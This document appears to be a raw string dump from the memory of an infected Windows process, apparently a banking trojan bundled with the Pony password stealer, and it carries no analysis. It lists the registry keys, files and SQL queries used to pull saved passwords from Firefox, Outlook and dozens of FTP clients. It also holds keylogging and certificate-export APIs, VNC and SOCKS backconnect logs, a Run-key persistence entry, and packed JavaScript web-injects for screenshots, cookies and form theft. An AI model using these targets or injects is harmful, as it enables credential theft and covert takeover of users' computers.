sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
<&<,<2<\<
.pdata
@.reloc
CRYPT32.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
iexplore.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

spoolsv.exe_1444_rwx_01320000_0007B000:

.text
.rdata
@.data
.reloc
t.FVSh4
_^SSSh
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1b(i){j.R=i;j.z=q;j.W=2;j.Q=l(){p(x K===\'I\'){K=l(){A{k E G("J.H.6.0")}B(e){}A{k E G("J.H.3.0")}B(e){}A{k E G("J.H")}B(e){}A{k E G("Y.H")}B(e){}k u}}k E K()};j.o=l(a,b,c,d){L f=j.Q();L g=q;L h=j;F=(x(d)==\'I\')?u:s;b=\'/\' j.R \'/\' 18.19() \'/\' b;p(F==s){j.z=q;f.1a=l(){A{p(f.T==4){p(f.O!=P||f.y==\'-\'){h.z=u;p(x(d)=="l"){d(u)}}C{p(f.y==\' \'){h.z=s;p(x(d)=="l"){d(s)}}C{h.z=f.y;p(x(d)=="l"){d(f.y)}}}}}B(e){h.z=u;p(x(d)=="l"){d(u)}}}}f.1e(a,b,F);f.1g(c);p(F==s){k s}A{p(f.T==4&&f.O==P){p(f.y==\'-\'){k u}C{p(f.y==\' \'){k s}C{k f.y}}}k u}B(e){k u}};j.1p=l(){k j.z};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,q,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,q,b)};j.16=l(a){m=\'4/\';k j.o(\'w\',m,q,a)};j.17=l(a,b,c){t=(b==s)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,q,c)};j.1c=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==s)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=q;N=\'w\'}C{c=\'1f: \' c;N=\'v\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,q,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,q,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'v\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'v\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,q,a)}};',62,92,'|||||||||||||||||||this|return|function|Url||Query|if|null||true||false|POST|GET|typeof|responseText|_LastAsync|try|catch|else||new|Async|ActiveXObject|XMLHTTP|undefined|Msxml2|XMLHttpRequest|var|Post|Type|status|200|GetXHR|_Key||readyState|Data|SetVal|Version|GetVal|Microsoft|DelVal|||||||ClearVals|GetServer|Math|random|onreadystatechange|EQFramework|PostServer|Get|open|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=z k(){i.P=p;i.w=p;i.Y=3;i.O=k(){o(y N===\'H\'){N=k(){A{j z G("L.E.6.0")}B(e){}A{j z G("L.E.3.0")}B(e){}A{j z G("L.E")}B(e){}A{j z G("W.E")}B(e){}j s}}j z N()};i.m=k(a,b,c,d){J f=i.O();J g=p;J h=i;F=(y(d)==\'H\')?s:q;b=\'/\' i.P \'/\' 19.1a() \'/\' b;o(F==q){i.w=p;f.1p=k(){A{o(f.T==4){o(f.R!=Q||f.x==\'-\'){h.w=s;o(y(d)=="k"){d(s)}}C{o(f.x==\' \'){h.w=q;o(y(d)=="k"){d(q)}}C{h.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){h.w=s;o(y(d)=="k"){d(s)}}}}f.1b(a,b,F);f.1e(c);o(F==q){j q}A{o(f.T==4&&f.R==Q){o(f.x==\'-\'){j s}C{o(f.x==\' \'){j q}C{j f.x}}}j s}B(e){j s}};i.1g=k(){j i.w};i.1w=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.16=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.17=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(y(c)==\'H\'||c==s){c=p;I=\'v\'}C{c=\'1f: \' c;I=\'u\'}j i.m(I,\'6/\' t \'/\' a,c,d)};i.M=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';M=a "\\r\\n" b;j i.m(\'u\',l,M,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1q.1r;j i.m(\'u\',l,U,b)};i.1s=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1t=k(a){K=V.1u(a);K.1v.18(K)}};',62,95,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|_LastAsync|responseText|typeof|new|try|catch|else||XMLHTTP|Async|ActiveXObject|undefined|Type|var|El|Msxml2|Post|XMLHttpRequest|GetXHR|Key|200|status||readyState|Data|document|Microsoft|GetVal|Version|DelVal|||||||ClearVals|GetServer|removeChild|Math|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|onreadystatechange|location|href|StopVideo|Hide|getElementById|parentNode|SetVal'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
/work/1.php?sid=%0.8X%0.8X%0.4X%0.4X%0.2X%0.2X%0.4X
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
<&<,<2<\<
%System%\spoolsv.exe
iexplore.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

imapi.exe_1780_rwx_00AB0000_00054000:

%Documents and Settings%\All Users\Application Data\IfarZozip\IfarZozip.dat
.text
.rdata
@.data
.reloc
t.FVSh4
_^SSSh
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1b(i){j.R=i;j.z=q;j.W=2;j.Q=l(){p(x K===\'I\'){K=l(){A{k E G("J.H.6.0")}B(e){}A{k E G("J.H.3.0")}B(e){}A{k E G("J.H")}B(e){}A{k E G("Y.H")}B(e){}k u}}k E K()};j.o=l(a,b,c,d){L f=j.Q();L g=q;L h=j;F=(x(d)==\'I\')?u:s;b=\'/\' j.R \'/\' 18.19() \'/\' b;p(F==s){j.z=q;f.1a=l(){A{p(f.T==4){p(f.O!=P||f.y==\'-\'){h.z=u;p(x(d)=="l"){d(u)}}C{p(f.y==\' \'){h.z=s;p(x(d)=="l"){d(s)}}C{h.z=f.y;p(x(d)=="l"){d(f.y)}}}}}B(e){h.z=u;p(x(d)=="l"){d(u)}}}}f.1e(a,b,F);f.1g(c);p(F==s){k s}A{p(f.T==4&&f.O==P){p(f.y==\'-\'){k u}C{p(f.y==\' \'){k s}C{k f.y}}}k u}B(e){k u}};j.1p=l(){k j.z};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,q,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,q,b)};j.16=l(a){m=\'4/\';k j.o(\'w\',m,q,a)};j.17=l(a,b,c){t=(b==s)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,q,c)};j.1c=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==s)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=q;N=\'w\'}C{c=\'1f: \' c;N=\'v\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,q,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,q,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'v\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'v\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,q,a)}};',62,92,'|||||||||||||||||||this|return|function|Url||Query|if|null||true||false|POST|GET|typeof|responseText|_LastAsync|try|catch|else||new|Async|ActiveXObject|XMLHTTP|undefined|Msxml2|XMLHttpRequest|var|Post|Type|status|200|GetXHR|_Key||readyState|Data|SetVal|Version|GetVal|Microsoft|DelVal|||||||ClearVals|GetServer|Math|random|onreadystatechange|EQFramework|PostServer|Get|open|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=z k(){i.P=p;i.w=p;i.Y=3;i.O=k(){o(y N===\'H\'){N=k(){A{j z G("L.E.6.0")}B(e){}A{j z G("L.E.3.0")}B(e){}A{j z G("L.E")}B(e){}A{j z G("W.E")}B(e){}j s}}j z N()};i.m=k(a,b,c,d){J f=i.O();J g=p;J h=i;F=(y(d)==\'H\')?s:q;b=\'/\' i.P \'/\' 19.1a() \'/\' b;o(F==q){i.w=p;f.1p=k(){A{o(f.T==4){o(f.R!=Q||f.x==\'-\'){h.w=s;o(y(d)=="k"){d(s)}}C{o(f.x==\' \'){h.w=q;o(y(d)=="k"){d(q)}}C{h.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){h.w=s;o(y(d)=="k"){d(s)}}}}f.1b(a,b,F);f.1e(c);o(F==q){j q}A{o(f.T==4&&f.R==Q){o(f.x==\'-\'){j s}C{o(f.x==\' \'){j q}C{j f.x}}}j s}B(e){j s}};i.1g=k(){j i.w};i.1w=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.16=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.17=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(y(c)==\'H\'||c==s){c=p;I=\'v\'}C{c=\'1f: \' c;I=\'u\'}j i.m(I,\'6/\' t \'/\' a,c,d)};i.M=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';M=a "\\r\\n" b;j i.m(\'u\',l,M,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1q.1r;j i.m(\'u\',l,U,b)};i.1s=k(a){l=\'15/\';j 